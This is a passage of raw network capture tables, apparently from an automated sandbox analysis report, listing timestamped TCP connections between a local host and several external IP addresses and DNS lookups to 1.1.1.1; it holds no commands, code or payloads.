                                                                                                                    Sep 30, 2024 18:58:31.009663105 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.009721041 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.009742022 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.009788036 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.019114017 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.019136906 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.019217014 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.019233942 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.019279957 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.019448996 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.019465923 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.019520998 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.019527912 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.019619942 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.019700050 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.019735098 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.019758940 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.019763947 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.019789934 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.091762066 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.091797113 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.091862917 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.091941118 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.091962099 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.092273951 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.092293978 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.092365980 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.092386007 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.092422962 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.092453957 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.092497110 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.092515945 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.092535973 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.092581987 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.092664957 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.092680931 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.092749119 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.092762947 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.092825890 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.092864037 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.092901945 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.092936993 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.092950106 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.092979908 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.093003988 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.105920076 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.105942965 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.106030941 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.106055021 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.106123924 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.106144905 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.106178999 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.106192112 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.106219053 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.106252909 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.106313944 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.106344938 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.106401920 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.178102970 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.178128004 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.178194046 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.178256035 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.178272009 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.178320885 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.178622961 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.178646088 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.178706884 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.178725958 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.178802967 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.178843021 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.178858995 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.178909063 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.178920984 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.178942919 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.179229975 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.179256916 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.179296017 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.179310083 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.179363012 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.179409027 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.179466009 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.179481030 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.179508924 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.179553032 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.179559946 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.179574013 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.179610014 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.179619074 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.179677010 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.179702997 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.179735899 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.179775000 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.179790020 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.179795980 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.179807901 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.179827929 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.179845095 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.179902077 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.179915905 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.179991007 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.180054903 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.180069923 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.192603111 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.192651987 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.192692995 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.192694902 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.192712069 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.192748070 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.192933083 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.192985058 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.192991972 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.192998886 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.193015099 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.193051100 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.193078041 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.193125963 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.193205118 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.193218946 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.193295956 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.234443903 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.234525919 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.264959097 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.265006065 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.265037060 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.265045881 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.265075922 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.265634060 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.265701056 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.265703917 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.265719891 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.265762091 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.265764952 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.265784979 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.265795946 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.265818119 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.265866041 CEST44349722188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:31.265933037 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:31.266341925 CEST49722443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:32.152065039 CEST49725443192.168.2.8162.159.135.234
                                                                                                                    Sep 30, 2024 18:58:32.152106047 CEST44349725162.159.135.234192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:32.152185917 CEST49725443192.168.2.8162.159.135.234
                                                                                                                    Sep 30, 2024 18:58:32.152513981 CEST49725443192.168.2.8162.159.135.234
                                                                                                                    Sep 30, 2024 18:58:32.152528048 CEST44349725162.159.135.234192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:32.611139059 CEST44349725162.159.135.234192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:32.611206055 CEST49725443192.168.2.8162.159.135.234
                                                                                                                    Sep 30, 2024 18:58:32.613504887 CEST49725443192.168.2.8162.159.135.234
                                                                                                                    Sep 30, 2024 18:58:32.613526106 CEST44349725162.159.135.234192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:32.613802910 CEST44349725162.159.135.234192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:32.614847898 CEST49725443192.168.2.8162.159.135.234
                                                                                                                    Sep 30, 2024 18:58:32.655411005 CEST44349725162.159.135.234192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:32.804477930 CEST44349725162.159.135.234192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:32.804544926 CEST44349725162.159.135.234192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:32.804600954 CEST49725443192.168.2.8162.159.135.234
                                                                                                                    Sep 30, 2024 18:58:32.805423021 CEST49725443192.168.2.8162.159.135.234
                                                                                                                    Sep 30, 2024 18:58:33.282917976 CEST4972080192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:35.650434017 CEST49706443192.168.2.823.206.229.226
                                                                                                                    Sep 30, 2024 18:58:35.651321888 CEST49706443192.168.2.823.206.229.226
                                                                                                                    Sep 30, 2024 18:58:35.651782036 CEST49728443192.168.2.823.206.229.226
                                                                                                                    Sep 30, 2024 18:58:35.651834965 CEST4434972823.206.229.226192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:35.651904106 CEST49728443192.168.2.823.206.229.226
                                                                                                                    Sep 30, 2024 18:58:35.653863907 CEST49728443192.168.2.823.206.229.226
                                                                                                                    Sep 30, 2024 18:58:35.653879881 CEST4434972823.206.229.226192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:35.658318996 CEST4434970623.206.229.226192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:35.659040928 CEST4434970623.206.229.226192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:36.252650023 CEST4434972823.206.229.226192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:36.252809048 CEST49728443192.168.2.823.206.229.226
                                                                                                                    Sep 30, 2024 18:58:36.790719986 CEST49729443192.168.2.852.165.165.26
                                                                                                                    Sep 30, 2024 18:58:36.790755987 CEST4434972952.165.165.26192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:36.790816069 CEST49729443192.168.2.852.165.165.26
                                                                                                                    Sep 30, 2024 18:58:36.792089939 CEST49729443192.168.2.852.165.165.26
                                                                                                                    Sep 30, 2024 18:58:36.792100906 CEST4434972952.165.165.26192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:37.695569992 CEST4434972952.165.165.26192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:37.695641041 CEST49729443192.168.2.852.165.165.26
                                                                                                                    Sep 30, 2024 18:58:37.699248075 CEST49729443192.168.2.852.165.165.26
                                                                                                                    Sep 30, 2024 18:58:37.699255943 CEST4434972952.165.165.26192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:37.699510098 CEST4434972952.165.165.26192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:37.743098974 CEST49729443192.168.2.852.165.165.26
                                                                                                                    Sep 30, 2024 18:58:38.426830053 CEST49729443192.168.2.852.165.165.26
                                                                                                                    Sep 30, 2024 18:58:38.467403889 CEST4434972952.165.165.26192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:38.650250912 CEST4434972952.165.165.26192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:38.650273085 CEST4434972952.165.165.26192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:38.650279999 CEST4434972952.165.165.26192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:38.650293112 CEST4434972952.165.165.26192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:38.650321007 CEST4434972952.165.165.26192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:38.650362968 CEST49729443192.168.2.852.165.165.26
                                                                                                                    Sep 30, 2024 18:58:38.650401115 CEST4434972952.165.165.26192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:38.650439978 CEST49729443192.168.2.852.165.165.26
                                                                                                                    Sep 30, 2024 18:58:38.650440931 CEST4434972952.165.165.26192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:38.650453091 CEST4434972952.165.165.26192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:38.650486946 CEST49729443192.168.2.852.165.165.26
                                                                                                                    Sep 30, 2024 18:58:38.650494099 CEST4434972952.165.165.26192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:38.650930882 CEST4434972952.165.165.26192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:38.650990963 CEST49729443192.168.2.852.165.165.26
                                                                                                                    Sep 30, 2024 18:58:38.663230896 CEST49729443192.168.2.852.165.165.26
                                                                                                                    Sep 30, 2024 18:58:38.663255930 CEST4434972952.165.165.26192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:38.663270950 CEST49729443192.168.2.852.165.165.26
                                                                                                                    Sep 30, 2024 18:58:38.663278103 CEST4434972952.165.165.26192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:39.308058977 CEST44349719142.250.186.132192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:39.308125019 CEST44349719142.250.186.132192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:39.308252096 CEST49719443192.168.2.8142.250.186.132
                                                                                                                    Sep 30, 2024 18:58:39.310503960 CEST49719443192.168.2.8142.250.186.132
                                                                                                                    Sep 30, 2024 18:58:39.310524940 CEST44349719142.250.186.132192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:55.410386086 CEST49714443192.168.2.8203.101.184.118
                                                                                                                    Sep 30, 2024 18:58:55.455415964 CEST44349714203.101.184.118192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:55.457076073 CEST4434972823.206.229.226192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:55.457185030 CEST49728443192.168.2.823.206.229.226
                                                                                                                    Sep 30, 2024 18:59:10.316443920 CEST44349714203.101.184.118192.168.2.8
                                                                                                                    Sep 30, 2024 18:59:10.316673994 CEST49714443192.168.2.8203.101.184.118
                                                                                                                    Sep 30, 2024 18:59:15.232239962 CEST49732443192.168.2.852.165.165.26
                                                                                                                    Sep 30, 2024 18:59:15.232292891 CEST4434973252.165.165.26192.168.2.8
                                                                                                                    Sep 30, 2024 18:59:15.232382059 CEST49732443192.168.2.852.165.165.26
                                                                                                                    Sep 30, 2024 18:59:15.265057087 CEST49732443192.168.2.852.165.165.26
                                                                                                                    Sep 30, 2024 18:59:15.265094042 CEST4434973252.165.165.26192.168.2.8
                                                                                                                    Sep 30, 2024 18:59:15.973090887 CEST4434973252.165.165.26192.168.2.8
                                                                                                                    Sep 30, 2024 18:59:15.973182917 CEST49732443192.168.2.852.165.165.26
                                                                                                                    Sep 30, 2024 18:59:15.978142977 CEST49732443192.168.2.852.165.165.26
                                                                                                                    Sep 30, 2024 18:59:15.978157043 CEST4434973252.165.165.26192.168.2.8
                                                                                                                    Sep 30, 2024 18:59:15.978427887 CEST4434973252.165.165.26192.168.2.8
                                                                                                                    Sep 30, 2024 18:59:15.979389906 CEST49732443192.168.2.852.165.165.26
                                                                                                                    Sep 30, 2024 18:59:16.023407936 CEST4434973252.165.165.26192.168.2.8
                                                                                                                    Sep 30, 2024 18:59:16.689228058 CEST4434973252.165.165.26192.168.2.8
                                                                                                                    Sep 30, 2024 18:59:16.689249992 CEST4434973252.165.165.26192.168.2.8
                                                                                                                    Sep 30, 2024 18:59:16.689270020 CEST4434973252.165.165.26192.168.2.8
                                                                                                                    Sep 30, 2024 18:59:16.689343929 CEST49732443192.168.2.852.165.165.26
                                                                                                                    Sep 30, 2024 18:59:16.689379930 CEST4434973252.165.165.26192.168.2.8
                                                                                                                    Sep 30, 2024 18:59:16.689436913 CEST49732443192.168.2.852.165.165.26
                                                                                                                    Sep 30, 2024 18:59:16.692543030 CEST4434973252.165.165.26192.168.2.8
                                                                                                                    Sep 30, 2024 18:59:16.692603111 CEST4434973252.165.165.26192.168.2.8
                                                                                                                    Sep 30, 2024 18:59:16.692631960 CEST49732443192.168.2.852.165.165.26
                                                                                                                    Sep 30, 2024 18:59:16.692639112 CEST4434973252.165.165.26192.168.2.8
                                                                                                                    Sep 30, 2024 18:59:16.692662001 CEST49732443192.168.2.852.165.165.26
                                                                                                                    Sep 30, 2024 18:59:16.692667007 CEST4434973252.165.165.26192.168.2.8
                                                                                                                    Sep 30, 2024 18:59:16.692712069 CEST49732443192.168.2.852.165.165.26
                                                                                                                    Sep 30, 2024 18:59:16.692799091 CEST49732443192.168.2.852.165.165.26
                                                                                                                    Sep 30, 2024 18:59:16.692817926 CEST4434973252.165.165.26192.168.2.8
                                                                                                                    Sep 30, 2024 18:59:16.692831039 CEST49732443192.168.2.852.165.165.26
                                                                                                                    Sep 30, 2024 18:59:16.692837000 CEST4434973252.165.165.26192.168.2.8
                                                                                                                    Sep 30, 2024 18:59:19.616697073 CEST8049707217.20.57.18192.168.2.8
                                                                                                                    Sep 30, 2024 18:59:19.616854906 CEST4970780192.168.2.8217.20.57.18
                                                                                                                    Sep 30, 2024 18:59:28.776050091 CEST49734443192.168.2.8142.250.186.132
                                                                                                                    Sep 30, 2024 18:59:28.776089907 CEST44349734142.250.186.132192.168.2.8
                                                                                                                    Sep 30, 2024 18:59:28.776159048 CEST49734443192.168.2.8142.250.186.132
                                                                                                                    Sep 30, 2024 18:59:28.776366949 CEST49734443192.168.2.8142.250.186.132
                                                                                                                    Sep 30, 2024 18:59:28.776381969 CEST44349734142.250.186.132192.168.2.8
                                                                                                                    Sep 30, 2024 18:59:29.405807972 CEST44349734142.250.186.132192.168.2.8
                                                                                                                    Sep 30, 2024 18:59:29.407763958 CEST49734443192.168.2.8142.250.186.132
                                                                                                                    Sep 30, 2024 18:59:29.407787085 CEST44349734142.250.186.132192.168.2.8
                                                                                                                    Sep 30, 2024 18:59:29.408138037 CEST44349734142.250.186.132192.168.2.8
                                                                                                                    Sep 30, 2024 18:59:29.408544064 CEST49734443192.168.2.8142.250.186.132
                                                                                                                    Sep 30, 2024 18:59:29.408607960 CEST44349734142.250.186.132192.168.2.8
                                                                                                                    Sep 30, 2024 18:59:29.462176085 CEST49734443192.168.2.8142.250.186.132
                                                                                                                    Sep 30, 2024 18:59:39.308686018 CEST44349734142.250.186.132192.168.2.8
                                                                                                                    Sep 30, 2024 18:59:39.308757067 CEST44349734142.250.186.132192.168.2.8
                                                                                                                    Sep 30, 2024 18:59:39.308805943 CEST49734443192.168.2.8142.250.186.132
                                                                                                                    Sep 30, 2024 18:59:41.308166981 CEST49734443192.168.2.8142.250.186.132
                                                                                                                    Sep 30, 2024 18:59:41.308202982 CEST44349734142.250.186.132192.168.2.8
                                                                                                                    Sep 30, 2024 19:00:05.260615110 CEST4970880192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 19:00:05.608572006 CEST4970880192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 19:00:05.687963009 CEST8049708188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 19:00:05.688111067 CEST8049708188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 19:00:05.688172102 CEST4970880192.168.2.8188.114.97.3
                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Sep 30, 2024 18:58:21.568511009 CEST5654653192.168.2.81.1.1.1
                                                                                                                    Sep 30, 2024 18:58:21.580779076 CEST53565461.1.1.1192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:21.736318111 CEST5654753192.168.2.81.1.1.1
                                                                                                                    Sep 30, 2024 18:58:21.747786999 CEST53565471.1.1.1192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:21.751010895 CEST5654853192.168.2.81.1.1.1
                                                                                                                    Sep 30, 2024 18:58:21.787338018 CEST53565481.1.1.1192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:21.787781954 CEST5654953192.168.2.81.1.1.1
                                                                                                                    Sep 30, 2024 18:58:21.824881077 CEST53565491.1.1.1192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:21.825268984 CEST5655053192.168.2.81.1.1.1
                                                                                                                    Sep 30, 2024 18:58:21.837192059 CEST53565501.1.1.1192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:21.837553978 CEST5655153192.168.2.81.1.1.1
                                                                                                                    Sep 30, 2024 18:58:21.868504047 CEST53565511.1.1.1192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:21.941942930 CEST5655253192.168.2.81.1.1.1
                                                                                                                    Sep 30, 2024 18:58:21.951627970 CEST53565521.1.1.1192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:21.953989983 CEST5655353192.168.2.81.1.1.1
                                                                                                                    Sep 30, 2024 18:58:21.986352921 CEST53565531.1.1.1192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:21.986926079 CEST5655453192.168.2.81.1.1.1
                                                                                                                    Sep 30, 2024 18:58:21.997402906 CEST53565541.1.1.1192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:21.997920036 CEST5655553192.168.2.81.1.1.1
                                                                                                                    Sep 30, 2024 18:58:22.011620045 CEST53565551.1.1.1192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:22.011877060 CEST5655653192.168.2.81.1.1.1
                                                                                                                    Sep 30, 2024 18:58:22.030313015 CEST53565561.1.1.1192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:24.310903072 CEST5087953192.168.2.81.1.1.1
                                                                                                                    Sep 30, 2024 18:58:24.347410917 CEST53508791.1.1.1192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:24.886264086 CEST6071953192.168.2.81.1.1.1
                                                                                                                    Sep 30, 2024 18:58:24.887777090 CEST5442153192.168.2.81.1.1.1
                                                                                                                    Sep 30, 2024 18:58:25.075524092 CEST53491921.1.1.1192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:25.076553106 CEST53537621.1.1.1192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:25.231288910 CEST53544211.1.1.1192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:25.386668921 CEST53607191.1.1.1192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:26.100677013 CEST53630061.1.1.1192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:28.724821091 CEST6354653192.168.2.81.1.1.1
                                                                                                                    Sep 30, 2024 18:58:28.724821091 CEST5323653192.168.2.81.1.1.1
                                                                                                                    Sep 30, 2024 18:58:28.731875896 CEST53635461.1.1.1192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:28.731895924 CEST53532361.1.1.1192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:32.142822027 CEST5503353192.168.2.81.1.1.1
                                                                                                                    Sep 30, 2024 18:58:32.151362896 CEST53550331.1.1.1192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:43.142417908 CEST53634081.1.1.1192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:58.147325039 CEST138138192.168.2.8192.168.2.255
                                                                                                                    Sep 30, 2024 18:59:02.110496044 CEST53552831.1.1.1192.168.2.8
                                                                                                                    Sep 30, 2024 18:59:24.494415998 CEST53603011.1.1.1192.168.2.8
                                                                                                                    Sep 30, 2024 18:59:24.627409935 CEST53581561.1.1.1192.168.2.8
                                                                                                                    Sep 30, 2024 18:59:52.737497091 CEST53524971.1.1.1192.168.2.8
                                                                                                                    Sep 30, 2024 19:00:37.786712885 CEST53638391.1.1.1192.168.2.8
                                                                                                                    Sep 30, 2024 19:01:53.897855043 CEST53584341.1.1.1192.168.2.8
                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
